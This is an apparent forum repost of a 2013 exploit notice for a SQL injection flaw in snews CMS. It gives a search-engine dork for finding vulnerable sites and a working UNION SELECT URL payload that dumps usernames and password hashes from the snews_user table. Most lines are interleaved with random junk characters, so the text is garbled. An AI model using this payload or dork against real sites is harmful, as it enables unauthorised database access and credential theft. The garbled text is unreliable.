标题: CMS snews SQL Injection Vulnerability
4 x/ e. ^$ `* j% N! k6 S0 y1 `作者: By onestree2 F; j& }& P! J- H7 C( w
下载地址 : http://snewscms.com/" q" o# e% y2 q% z3 h
测试平台 : ubuntu 12.10 / win 76 h k4 _. |4 s4 C" C# T7 r2 }* m
关键词: inurl:"tanyakan pada rumput yang bergoyang"7 R7 n# P# X* U3 O6 z. `
4 |! E0 D! s1 [2 S, D0 q
/ ]* H5 b$ t8 g# B+ f
*************************************************************& j4 w! w& H; e2 R* C) l
1 p, J0 h2 g- h+ v8 D' T
SQL poc:9 T/ p8 Y9 e# [9 K
C2 y" }* M3 S7 p: v4 d9 t
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]4 e. f$ ~2 w* W, N) m9 i
7 v& ^& j7 L7 @* ?$ p
示例
8 H- b. M3 R3 y, @ / E q* h) c% m- W1 d
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
' S# ^/ z7 L# S, H * \$ V0 I+ T E/ ~$ |
9 c8 l0 S1 V* G! ]4 d
致谢:
. j/ X, B( ?0 \5 C9 K
4 M$ ?* h$ }6 Y. t& m7 B5 O$ ^* Z Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell- H" g4 y: G7 q! q6 l& K! Q* X
7 z: @; I5 @8 P4 E5 h indonesiancoder - moeslimh4x0r - go-coder. E2 a' k- d2 ~9 f! J- d; p
2 D% q( O& `2 `; Lspesial my hunny :*
5 K, ^1 S2 i0 w2 {" e* s& {/ @ |
发表于 2013-1-23 08:55:06
收藏
支持
反对